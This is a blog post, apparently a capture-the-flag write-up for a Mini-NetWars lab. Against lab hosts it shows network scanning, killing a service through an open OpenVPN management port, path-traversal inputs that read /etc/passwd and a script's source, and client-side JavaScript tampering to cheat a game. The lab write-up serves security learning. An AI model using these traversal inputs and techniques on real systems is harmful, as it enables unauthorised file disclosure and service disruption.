<!doctype html>
<!--
  Minimal Mistakes Jekyll Theme 4.27.3 by Michael Rose
  Copyright 2013-2025 Michael Rose - mademistakes.com | @mmistakes
  Free for personal and commercial use under the MIT license
  https://github.com/mmistakes/minimal-mistakes/blob/master/LICENSE
-->

<html lang="en" class="no-js">
  <head>
    <meta charset="utf-8">

<!-- begin _includes/seo.html --><title>Mini-NetWars – Mission 3 (May 2020) - IanM.tech</title>
<meta name="description" content="I forgot to take notes and someone shared their’s with me. I stopped  at “Find the name of the debug PCAP on the web server”">


  <meta name="author" content="Ian Marrero">
  
  <meta property="article:author" content="Ian Marrero">
  


<meta property="og:type" content="article">
<meta property="og:locale" content="en_US">
<meta property="og:site_name" content="IanM.tech">
<meta property="og:title" content="Mini-NetWars – Mission 3 (May 2020)">
<meta property="og:url" content="http://localhost:4000/2020/05/mini-netwars-mission-3-may-2020/">


  <meta property="og:description" content="I forgot to take notes and someone shared their’s with me. I stopped  at “Find the name of the debug PCAP on the web server”">







  <meta property="article:published_time" content="2020-05-20T10:19:45-05:00">






<link rel="canonical" href="http://localhost:4000/2020/05/mini-netwars-mission-3-may-2020/">












<!-- end _includes/seo.html -->



  <link href="/feed.xml" type="application/atom+xml" rel="alternate" title="IanM.tech Feed">


<!-- https://t.co/dKP3o1e -->
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<script>
  document.documentElement.className = document.documentElement.className.replace(/\bno-js\b/g, '') + ' js ';
</script>

<!-- For all browsers -->
<link rel="stylesheet" href="/assets/css/main.css">
<link rel="preload" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5/css/all.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
<noscript><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5/css/all.min.css"></noscript>



    <!-- start custom head snippets -->

<!-- insert favicons. use https://realfavicongenerator.net/ -->
<link rel="apple-touch-icon" sizes="76x76" href="/assets/icons/apple-touch-icon.png?v=2">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/icons/favicon-32x32.png?v=2">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/icons/favicon-16x16.png?v=2">
<link rel="manifest" href="/assets/icons/site.webmanifest">
<link rel="mask-icon" href="/assets/icons/safari-pinned-tab.svg" color="#5bbad5">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="theme-color" content="#ffffff">

<!-- end custom head snippets -->

  </head>

  <body class="layout--single" dir="ltr">
    <nav class="skip-links">
  <ul>
    <li><a href="#site-nav" class="screen-reader-shortcut">Skip to primary navigation</a></li>
    <li><a href="#main" class="screen-reader-shortcut">Skip to content</a></li>
    <li><a href="#footer" class="screen-reader-shortcut">Skip to footer</a></li>
  </ul>
</nav>

    

<div class="masthead">
  <div class="masthead__inner-wrap">
    <div class="masthead__menu">
      <nav id="site-nav" class="greedy-nav">
        
          <a class="site-logo" href="/"><img src="/assets/images/logo.png" alt="IanM.tech"></a>
        
        <a class="site-title" href="/">
          IanM.tech
          
        </a>
        <ul class="visible-links">
<li class="masthead__menu-item">
              <a href="/posts/">Posts</a>
            </li>
<li class="masthead__menu-item">
              <a href="/projects/">Projects</a>
            </li>
<li class="masthead__menu-item">
              <a href="/about/">About</a>
            </li>
<li class="masthead__menu-item">
              <a href="/contact/">Contact</a>
            </li>
</ul>
        
        <button class="search__toggle" type="button">
          <span class="visually-hidden">Toggle search</span>
          <i class="fas fa-search"></i>
        </button>
        
        <button class="greedy-nav__toggle hidden" type="button">
          <span class="visually-hidden">Toggle menu</span>
          <div class="navicon"></div>
        </button>
        <ul class="hidden-links hidden"></ul>
      </nav>
    </div>
  </div>
</div>


    <div class="initial-content">
      





<div id="main" role="main">
  
  <div class="sidebar sticky">
  


<div itemscope itemtype="https://schema.org/Person" class="h-card">

  
    <div class="author__avatar">
      <a href="http://localhost:4000/">
        <img src="/assets/images/bio-photo.jpg" alt="Ian Marrero" itemprop="image" class="u-photo">
      </a>
    </div>
  

  <div class="author__content">
    <h3 class="author__name p-name" itemprop="name">
      <a class="u-url" rel="me" href="http://localhost:4000/" itemprop="url">Ian Marrero</a>
    </h3>
    
      <div class="author__bio p-note" itemprop="description">
        <p>Cybersecurity Engineer</p>

      </div>
    
  </div>

  <div class="author__urls-wrapper">
    <button class="btn btn--inverse">Follow</button>
    <ul class="author__urls social-icons">
      

      
        
          
            <li><a href="https://facebook.com/ian.marrero" rel="nofollow noopener noreferrer me" itemprop="sameAs"><i class="fab fa-fw fa-facebook" aria-hidden="true"></i><span class="label">Facebook</span></a></li>
          
        
          
            <li><a href="https://instagram.com/ian.marrero" rel="nofollow noopener noreferrer me" itemprop="sameAs"><i class="fab fa-fw fa-instagram" aria-hidden="true"></i><span class="label">Instagram</span></a></li>
          
        
          
            <li><a href="https://www.linkedin.com/in/ianmarrero/" rel="nofollow noopener noreferrer me" itemprop="sameAs"><i class="fab fa-fw fa-linkedin" aria-hidden="true"></i><span class="label">LinkedIn</span></a></li>
          
        
      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      <!--
  <li>
    <a href="http://link-to-whatever-social-network.com/user/" itemprop="sameAs" rel="nofollow noopener noreferrer me">
      <i class="fas fa-fw" aria-hidden="true"></i> Custom Social Profile Link
    </a>
  </li>
-->
    </ul>
  </div>
</div>

  
  </div>



  <article class="page" itemscope itemtype="https://schema.org/CreativeWork">
    <meta itemprop="headline" content="Mini-NetWars – Mission 3 (May 2020)">
    <meta itemprop="description" content="I forgot to take notes and someone shared their’s with me. I stopped  at “Find the name of the debug PCAP on the web server”">
    <meta itemprop="datePublished" content="2020-05-20T10:19:45-05:00">
    

    <div class="page__inner-wrap">
      
        <header>
          <h1 id="page-title" class="page__title" itemprop="headline">
            <a href="http://localhost:4000/2020/05/mini-netwars-mission-3-may-2020/" itemprop="url">Mini-NetWars – Mission 3 (May 2020)
</a>
          </h1>
          

  <p class="page__meta">
    

    

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          13 minute read
        
      </span>
    
  </p>


        </header>
      

      <section class="page__content" itemprop="text">
        
        <p class="notice--info">I forgot to take notes and someone shared their’s with me. I stopped  at “Find the name of the debug PCAP on the web server”</p>

<p><img src="/assets/images/2020/05/external-content.duckduckgo-150x150.jpg" alt=""></p>

<h1 id="snaaake">Snaaake</h1>

<h2 id="what-two-large-words-appear-first-when-you-exit-the-game-eg-elf-terminal">What two, large words appear first when you exit the game? e.g. Elf Terminal</h2>

<p>Quit the game through the UI and then:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>______             _____                       _
|  _  \           /  __ \                     | |
| | | |_____   __ | /  \/ ___  _ __  ___  ___ | | ___
| | | / _ \ \ / / | |    / _ \| '_ \/ __|/ _ \| |/ _ \
| |/ /  __/\ V /  | \__/\ (_) | | | \__ \ (_) | |  __/
|___/ \___| \_/    \____/\___/|_| |_|___/\___/|_|\___|

NOTE: Disable in production, port 3000

Tools:

* netcat
* openvpn
* nmap

Your IP is 192.168.64.2
</code></pre></div></div>

<h2 id="what-high-numbered-port-is-open-on-another-host-in-the-same-24-network-eg-5000">What high-numbered port is open on another host in the same /24 network? e.g. 5000</h2>

<p>3000</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>elf@52aadb50d975:~$ nmap -p- -sC -sV 192.168.64.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-14 18:44 UTC
Nmap scan report for 192.168.64.1
Host is up (0.00037s latency).

PORT     STATE SERVICE
3000/tcp open  ppp

Nmap scan report for 52aadb50d975 (192.168.64.2)
Host is up (0.00024s latency).

PORT     STATE  SERVICE
3000/tcp closed ppp

Nmap scan report for 960a1eb2-66db-49ea-9940-d1e5ed6dcdec-1.d4fd3562-d3fe-43ac-9d10-a91e46c3d8c2 (192.168.64.3)
Host is up (0.00021s latency).

PORT     STATE SERVICE
3000/tcp open  ppp

Nmap done: 256 IP addresses (3 hosts up) scanned in 2.85 seconds
</code></pre></div></div>

<h2 id="what-flag-is-shown-when-you-disable-something-outside-the-snaaake-game">What flag is shown when you disable something outside the Snaaake game?</h2>

<p>NetWars{ShutItDown}</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>elf@52aadb50d975:~$ netcat 192.168.64.3 3000
&gt;INFO:OpenVPN Management Interface Version 1 -- type 'help' for more info
help
Management Interface for OpenVPN 2.4.8 x86_64-alpine-linux-musl [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [MH/PKTINFO] [AEAD] built on Feb  7 2020
Commands:
auth-retry t           : Auth failure retry mode (none,interact,nointeract).
bytecount n            : Show bytes in/out, update every n secs (0=off).
echo [on|off] [N|all]  : Like log, but only show messages in echo buffer.
exit|quit              : Close management session.
forget-passwords       : Forget passwords entered so far.
help                   : Print this message.
hold [on|off|release]  : Set/show hold flag to on/off state, or
                         release current hold and start tunnel.
kill cn                : Kill the client instance(s) having common name cn.
kill IP:port           : Kill the client instance connecting from IP:port.
load-stats             : Show global server load stats.
log [on|off] [N|all]   : Turn on/off realtime log display
                         + show last N lines or 'all' for entire history.
mute [n]               : Set log mute level to n, or show level if n is absent.
needok type action     : Enter confirmation for NEED-OK request of 'type',
                         where action = 'ok' or 'cancel'.
needstr type action    : Enter confirmation for NEED-STR request of 'type',
                         where action is reply string.
net                    : (Windows only) Show network info and routing table.
password type p        : Enter password p for a queried OpenVPN password.
remote type [host port] : Override remote directive, type=ACCEPT|MOD|SKIP.
proxy type [host port flags] : Enter dynamic proxy server info.
pid                    : Show process ID of the current OpenVPN process.
client-auth CID KID    : Authenticate client-id/key-id CID/KID (MULTILINE)
client-auth-nt CID KID : Authenticate client-id/key-id CID/KID
client-deny CID KID R [CR] : Deny auth client-id/key-id CID/KID with log reason
                             text R and optional client reason text CR
client-kill CID [M]    : Kill client instance CID with message M (def=RESTART)
env-filter [level]     : Set env-var filter level
client-pf CID          : Define packet filter for client CID (MULTILINE)
rsa-sig                : Enter an RSA signature in response to &gt;RSA_SIGN challenge
                         Enter signature base64 on subsequent lines followed by END
certificate            : Enter a client certificate in response to &gt;NEED-CERT challenge
                         Enter certificate base64 on subsequent lines followed by END
signal s               : Send signal s to daemon,
                         s = SIGHUP|SIGTERM|SIGUSR1|SIGUSR2.
state [on|off] [N|all] : Like log, but show state history.
status [n]             : Show current daemon status info using format #n.
test n                 : Produce n lines of output for testing/debugging.
username type u        : Enter username u for a queried OpenVPN username.
verb [n]               : Set log verbosity level to n, or show if n is absent.
version                : Show current version number.
END
signal SIGTERM
SUCCESS: signal SIGTERM thrown
elf@52aadb50d975:~$

     __     _   __    __                 ____ _           _    _____ _      ___                  __
  /\ \ \___| |_/ / /\ \ \__ _ _ __ ___  / / _\ |__  _   _| |_  \_   \ |_   /   \_____      ___ __\ \
 /  \/ / _ \ __\ \/  \/ / _` | '__/ __|| |\ \| '_ \| | | | __|  / /\/ __| / /\ / _ \ \ /\ / / '_ \| |
/ /\  /  __/ |_ \  /\  / (_| | |  \__ &lt; &lt; _\ \ | | | |_| | |_/\/ /_ | |_ / /_// (_) \ V  V /| | | |&gt; &gt;
\_\ \/ \___|\__| \/  \/ \__,_|_|  |___/| |\__/_| |_|\__,_|\__\____/  \__/___,' \___/ \_/\_/ |_| |_| |
                                        \_\                                                      /_/

NetWars{ShutItDown}
</code></pre></div></div>

<h1 id="same">SAME</h1>

<h2 id="if-you-type-in-a-bad-difficulty-level-what-is-the-error-type-that-occurs-eg-sparkletoohigherror">If you type in a bad difficulty level, what is the error type that occurs? (e.g. SparkleTooHighError)</h2>

<p>FileNotFoundError</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>What difficulty level would you like? Options: easy, medium, hard -&gt; super hard
Oops, something went wrong reading the configuration file: FileNotFoundError
[Errno 2] No such file or directory: '/home/same/super hard'

Press ctrl-c to exit
</code></pre></div></div>

<h2 id="if-you-load-an-invalid-file-using-a-path-traversal-what-type-of-file-is-it-expecting-eg-yaml">If you load an invalid file using a path traversal, what type of file is it expecting? (e.g. YAML)</h2>

<p>JSON</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>╭─zoey@nomadic ~/netwars
╰─$ nc same.elfu.org 8080
What difficulty level would you like? Options: easy, medium, hard -&gt; ../../etc/passwd
Failed to parse JSON configuration file: &lt;class 'json.decoder.JSONDecodeError'&gt;
Expecting value: line 1 column 1 (char 0)

-- START DEBUG INFORMATION --
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
same:x:1000:1000:,,,:/home/same:/bin/bash
Debian-exim:x:101:101::/var/spool/exim4:/usr/sbin/nologin

-- END DEBUG INFORMATION --

Press ctrl-c to exit
</code></pre></div></div>

<h2 id="can-you-find-the-full-path-to-the-python-script-eg-pathtofilepy">Can you find the full path to the Python script? (e.g. /path/to/file.py)</h2>

<p><code class="language-plaintext highlighter-rouge">/home/same/same.py</code></p>

<h2 id="what-is-the-flag-at-the-top-of-the-python-script-eg-netwarsiheartchristmas-">What is the flag at the top of the Python script? (e.g. NetWars{IHeartChristmas} )</h2>

<p><code class="language-plaintext highlighter-rouge">NetWars{you_found_me}</code></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>╭─zoey@nomadic /proc/self/cwd
╰─$ nc same.elfu.org 8080
What difficulty level would you like? Options: easy, medium, hard -&gt; ../../proc/self/cmdline
Failed to parse JSON configuration file: &lt;class 'json.decoder.JSONDecodeError'&gt;
Expecting value: line 1 column 1 (char 0)

-- START DEBUG INFORMATION --
python3/home/same/same.py
-- END DEBUG INFORMATION --

Press ctrl-c to exit
╭─zoey@nomadic /proc/self/cwd
╰─$ nc same.elfu.org 8080
What difficulty level would you like? Options: easy, medium, hard -&gt; ../../home/same/same.py
Failed to parse JSON configuration file: &lt;class 'json.decoder.JSONDecodeError'&gt;
Expecting value: line 1 column 1 (char 0)

-- START DEBUG INFORMATION --
#!/usr/bin/env python3

# Flag: NetWars{you_found_me}

import json
import random
import os
</code></pre></div></div>

<h1 id="snowball-fight">Snowball Fight</h1>

<h2 id="win-a-game-of-snowball-fight-and-submit-the-flag-eg-netwarsbooya-">Win a game of Snowball Fight and submit the flag. (e.g. NetWars{BooYa} )</h2>

<p><code class="language-plaintext highlighter-rouge">NetWars{YouSankMyBattlefort}</code></p>

<h2 id="win-a-game-of-snowball-fight-on-impossible-and-submit-the-flag">Win a game of Snowball Fight on Impossible and submit the flag.</h2>

<p>You can use chrome to override <code class="language-plaintext highlighter-rouge">battlefort.js</code> and look at the websocket network history in dev tools. Change the following source code and it should print out the<br>
forts on the board:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ws.onmessage = function (event) {
  // console.log("Incoming ws: " + event.data);
  var messageIn = JSON.parse(event.data);
  messageIn.Verify =
    "gLtBovwCiHRjhMyop4ixz4ZrY7OtPjIcFJH4z5/++jfdgLV3uWHeQrpH6G/6D8vevy7bDFQLrHTCFNEfid6TMaxLLfjubszh4YWz5gErH4UlpVMC5CtMKqocvB33/Ofuy9JW98syEJ8DlHxjWHIfgnFib+tSbB6Mn3lS2aJs3ecS7X9DcdRBIz5PiuVv8XFLsYxYawNN2/IlSpez3TQq9pitBnfK2OftKy9aQvRVaElxYm/rUmwejJ95UtmibN3nzUhgVN+wSzmAGlhhbU1oobGMWGsDTdvyJUqXs900KvatvHia9fQXrL6BZ2J55TShNmf+fu4R02nzzbTKtgFXI0CS8HrrvB6esG/Uvl8IjY7ECriW/24zy4HqV2SZ5VJz7wh8tgE66H1JGiXbhzVDmxfpDBThRiYLTanqPJxw0Rws3nBVCoE40KiHRjiKOOivKmoUgl+BFH114fWj77UeVQXBywXdmWNPGVMJWeL2KqmX/K3sHDWzMkWORecGv5NIdtTot0OsFopJD4u/3YhSVKvAxr7ydRI/+kDPPD8957yiqXhFtZJU1L+TfFZQDyLvzeMV9WpktxeIwpTdgbyaioVxIZ3SlBKPhx4FSXtepu9TS858j2MkGY+2p1FWc6dCtDLvS+20sYhygmIUG/TQN9ynBU/lNdQGkNKxPp5nX5Cx/91Hb3qtWtvuOUqtkb2v24wI31q87S8WKaoWy93l5tBKjkfv6njkUCPpqPWYmpdb0tWU2D7KbirHuU5h8VzvrmIRDvgv8jnf+WbsajMcvdW0z/QVH9UoOxE8TvajTkbjqaJD7AnI8I7x4++jDFtqhQTvi09iGjTvS8JMHSvDAz/pLd1j6VHfaGGpyy5VI6lIhhilpqOKcFQBGNzfIj153A9370YX9rSTrM8UhRVyafrd1WjoSz8hO3P+Nd2uJEzdhps6dVQeA0FkUcNoJphNES0Ztlx7H1m1fkSRlDRR9Z3YmIapTTBo6eNsVCFWPLbfE3VTXArv2lpN7CpY/YMCyYtSZtjcFSz3AFQsMPFHr2Y5JcM3G4Ewfw8MRlzjGNLcD3fvRhf2tJOszxSFFXJp3YC1d7lh3kK6R+hv+g/L3rbTlTGyoCuyVQpaljvMl1okejtWRmico9wuLYDp7UrGhtvhE6sbmaEm4w59ltMnHUjY4tWdmqcMTS6fx5PzOWIlCWbOnd1qVf26HdnHJyADFgg2N7OjlShcv92EEVYdVfc6YZ54r5Lkt51w7nIyQUWWI1FxYy8eXcpEYURvHqIFojRyV9E6IeLn720WCSjcHoanGqGdpHnYWAGDSDs9T/YgLJiUNHMyhGCL9L+ImIiwWvRejDJIRdIwK9h27OHioSsXoGKat2ELWTootQhmUUg=";

  if (messageIn.Type == "SALUTE") {
    document.getElementById("statusVerify").value = messageIn.Verify;
    for (y = 0; y &lt; messageIn.Status["FriendlyLayout"].length; y++) {
      for (x = 0; x &lt; messageIn.Status["FriendlyLayout"][y].length; x++) {
        if (messageIn.Status["FriendlyLayout"][y][x] == 1) {
          document.getElementById("1," + x + "," + y).classList.add("fort");
        }
      }
    }
    document.getElementById("statusVerify").value = messageIn.Verify;
    for (y = 0; y &lt; messageIn.Status["EnemyLayout"].length; y++) {
      for (x = 0; x &lt; messageIn.Status["EnemyLayout"][y].length; x++) {
        if (messageIn.Status["EnemyLayout"][y][x] == 1) {
          document.getElementById("0," + x + "," + y).classList.add("fort");
        }
      }
    }
  }

</code></pre></div></div>

<p>Click the forts and you end up with a message:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>You win!
You won on impossible! NetWars{YouMustBePeeking
</code></pre></div></div>

<h2 id="defeat-the-enemy-with-one-shot-and-submit-the-flag">Defeat the Enemy with one shot and submit the flag.</h2>

<p>Enemy is very literal here and refers to the actual text on the board which is right above 0,0. So lets entire 0, -1 in and we get the following message<br>
in the console:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>NetWars{ThatsOneWayToWin}
</code></pre></div></div>

<h1 id="play-pawng">Play pawng</h1>

<h2 id="complete-the-pawng-scapy-trainer-whats-your-certificate-id-number">Complete the Pawng Scapy Trainer. What’s your certificate ID number?</h2>

<p>47150284637509565 – Just go through the training to get it. Look at the scapy docs.</p>

<h2 id="find-the-get-help-instruction-id-from-sending-a-scapy-packet">Find the (Get Help) Instruction ID from sending a Scapy packet</h2>

<p>The packet is described in <code class="language-plaintext highlighter-rouge">broken_controller.py</code>, run <code class="language-plaintext highlighter-rouge">tail -F /var/log/pawng.log</code>, and use the python to send the packet</p>

<p>2196517487091929</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>elfadmin@7fbaa7f9eae5:~$ python3
Python 3.6.9 (default, Apr 18 2020, 01:56:04)
[GCC 8.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
&gt;&gt;&gt; from scapy.all import *
&gt;&gt;&gt; sr1(IP(dst="127.0.0.1")/UDP(dport=20,sport=5000))
Begin emission:
Finished sending 1 packets.
.*
Received 2 packets, got 1 answers, remaining 0 packets
&lt;IP  version=4 ihl=5 tos=0x0 len=1536 id=1 flags= frag=0 ttl=64 proto=udp chksum=0x76ea src=127.0.0.1 dst=127.0.0.1 |&lt;UDP  sport=20 dport=5000 len=1516 chksum=0x5581 |&lt;Raw  load='\xe2\x94\x8d\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x
80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x9
4\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2
\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x91\
n\xe2\x94\x82 ARCADE PAWNG HELP:                                           \xe2\x94\x82\n\xe2\x94\x95\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2
\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\
xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x
80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x99\n1. Get This Help Menu:\n    Send a UDP packet to any 127.0.0.1 w/ a dst UDP port of 20\n
   and src UDP port of 5000.\n2. Move Paddle Up:\n    Send a TCP packet w/ IP dst="127.0.20.180", TCP dport=20, \n    TCP flags="PA", and a TCP raw paylod of load="up".\n3. Move Paddle Down:\n    Send an ICMP echo reply w/ IP dst="127.80
.1.46", and a \n    ICMP raw paylod of load="down".\n4. Change Computer Opponent\'s Difficulty:\n    Send a DNS query response to UDP port 53 with a source \n    port of 6000 to any 127.0.0.1 with a DNS qr=1, DNSQR \n    qname="difficult
y.local", and the DNSRR \n    rrname="difficulty.local" and the DNSRR rdata="100".\nNote: The 100 in rdata="100", specifies difficulty from 0-100.\nNote: Packet protocol details NOT specified above dont matter.\nNote: Results of actions
1-4 are logged to /var/log/pawng.log.\nNote: The first to score 10 points wins. \n\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x8
0\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94
\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\
x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\n' |&gt;&gt;&gt;
&gt;&gt;&gt;
KeyboardInterrupt
&gt;&gt;&gt;
KeyboardInterrupt
&gt;&gt;&gt;
elfadmin@7fbaa7f9eae5:~$ cat /var/log/pawng.log
(Get Help) Instruction ID 2196517487091929 Executed
(Get Help) Instruction ID 2196517487091929 Executed
</code></pre></div></div>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1. Get This Help Menu:
    Send a UDP packet to any 127.0.0.1 w/ a dst UDP port of 20
   and src UDP port of 5000.
2. Move Paddle Up:
    Send a TCP packet w/ IP dst="127.0.20.180", TCP dport=20,
    TCP flags="PA", and a TCP raw paylod of load="up".
3. Move Paddle Down:
    Send an ICMP echo reply w/ IP dst="127.80.1.46", and a
    ICMP raw paylod of load="down".
4. Change Computer Opponent\'s Difficulty:
    Send a DNS query response to UDP port 53 with a source
    port of 6000 to any 127.0.0.1 with a DNS qr=1, DNSQR
    qname="difficulty.local", and the DNSRR
    rrname="difficulty.local" and the DNSRR rdata="100".
Note: The 100 in rdata="100", specifies difficulty from 0-100.
Note: Packet protocol details NOT specified above dont matter.
Note: Results of actions 1-4 are logged to /var/log/pawng.log.
Note: The first to score 10 points wins.
</code></pre></div></div>

<h2 id="find-the-move-up-paddle-instruction-id">Find the (Move Up) Paddle Instruction ID</h2>

<p>9802227387255195</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>lfadmin@7fbaa7f9eae5:~\$ python3
Python 3.6.9 (default, Apr 18 2020, 01:56:04)
[GCC 8.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.

&gt; &gt; &gt; from scapy.all import\*
&gt; &gt; &gt; sr1(IP(dst="127.0.20.180")/TCP(dport=20,flags="PA")/Raw(load="up"))
&gt; &gt; &gt; Begin emission:
&gt; &gt; &gt; Finished sending 1 packets.
&gt; &gt; &gt; .^C
&gt; &gt; &gt; Received 1 packets, got 0 answers, remaining 1 packets
&gt; &gt; &gt;
&gt; &gt; &gt; elfadmin@7fbaa7f9eae5:~\$ cat /var/log/pawng.log
&gt; &gt; &gt; (Get Help) Instruction ID 2196517487091929 Executed
&gt; &gt; &gt; (Get Help) Instruction ID 2196517487091929 Executed
&gt; &gt; &gt; (Move Up) Paddle Instruction ID 9802227387255195 Executed
&gt; &gt; &gt; (Move Up) Paddle Instruction ID 9802227387255195 Executed
</code></pre></div></div>

<h2 id="find-the-move-down-instruction">Find the Move Down Instruction</h2>

<p>2116779544198846</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>elfadmin@7fbaa7f9eae5:~$ tail -F /var/log/pawng.log &amp;
[1] 206
elfadmin@7fbaa7f9eae5:~$ (Get Help) Instruction ID 2196517487091929 Executed
(Get Help) Instruction ID 2196517487091929 Executed
(Move Up) Paddle Instruction ID 9802227387255195 Executed
(Move Up) Paddle Instruction ID 9802227387255195 Executed
elfadmin@7fbaa7f9eae5:~\$ python3
Python 3.6.9 (default, Apr 18 2020, 01:56:04)
[GCC 8.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.

&gt; &gt; &gt; from scapy.all import \*
&gt; &gt; &gt; send(IP(dst="127.80.1.46")/ICMP(type="echo-reply")/Raw(load="down"))
&gt; &gt; &gt; .
&gt; &gt; &gt; Sent 1 packets.
&gt; &gt; &gt; (Move Down) Paddle Instruction ID 2116779544198846 Executed
</code></pre></div></div>

<h2 id="find-the-change-difficult-instruction-id">Find the CHange Difficult Instruction ID</h2>

<p>8892931792975189</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>elfadmin@7fbaa7f9eae5:~\$ ./scapy
